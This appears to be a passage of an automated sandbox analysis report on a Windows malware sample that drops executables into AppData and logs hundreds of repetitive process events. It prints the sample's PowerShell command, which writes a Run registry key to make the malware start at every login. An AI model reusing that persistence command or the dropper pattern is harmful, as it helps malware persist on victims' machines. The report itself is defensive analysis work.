                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc' -Value '"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"' -PropertyType 'String'Jump to behavior
                  Source: 57lklPjdPc.exeStatic PE information: 0x9944C62E [Mon Jun 26 19:40:30 2051 UTC]
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D65508 push edi; retf 0005h0_2_05D6550A
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D64781 push eax; retf 0005h0_2_05D64782
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D64741 push eax; retf 0005h0_2_05D64742
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D64709 push eax; retf 0005h0_2_05D6470A
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D62630 pushfd ; retf 0005h0_2_05D62631
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D64D71 push ebx; retf 0005h0_2_05D64D72
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D64D39 push ebx; retf 0005h0_2_05D64D3A
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D64CD9 push ebx; retf 0005h0_2_05D64CDA
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D64C80 push ebx; retf 0005h0_2_05D64C82
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D64CA0 push ebx; retf 0005h0_2_05D64CA2
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D6CF83 push eax; iretd 0_2_05D6CF89
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D649D9 push ecx; retf 0005h0_2_05D649DA
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D64951 push ecx; retf 0005h0_2_05D64952
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D64971 push ecx; retf 0005h0_2_05D64972
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D648C0 push ecx; retf 0005h0_2_05D64912
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D64891 push ecx; retf 0005h0_2_05D64892
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D648B0 push ecx; retf 0005h0_2_05D648B2
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D64859 push ecx; retf 0005h0_2_05D6485A
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D64801 push eax; retf 0005h0_2_05D64802
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D64B89 push edx; retf 0005h0_2_05D64B8A
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D64B31 push edx; retf 0005h0_2_05D64B32
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D64AC8 push edx; retf 0005h0_2_05D64ACA
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D64AF9 push edx; retf 0005h0_2_05D64AFA
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D64A08 push ecx; retf 0005h0_2_05D64A0A
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D7E047 push esi; retf 0_2_05D7E052
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D99F8D push ebx; iretd 0_2_05D99F92
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D99F6C push ebx; iretd 0_2_05D99F92
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D9576F push edx; retf 0_2_05D9577E
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_05D956A0 push esp; retf 0_2_05D956AD
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_0663463F push esi; retf 0_2_0663464A
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeCode function: 0_2_0663760F push esi; retf 0_2_0663761A
                  Source: 57lklPjdPc.exeStatic PE information: section name: .text entropy: 7.870067595402444
                  Source: l6E.exe.0.drStatic PE information: section name: .text entropy: 7.99531886540761
                  Source: 57lklPjdPc.exe.0.drStatic PE information: section name: .text entropy: 7.870067595402444
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeFile created: C:\Users\user\AppData\Roaming\l6E.exeJump to dropped file
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeFile created: C:\Users\user\AppData\Roaming\57lklPjdPc.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 57lklPjdPcJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 57lklPjdPcJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\9ADACFCAA0CF085A27C39D9B05641431 93b21885452761d5418e7b08ca003661Jump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
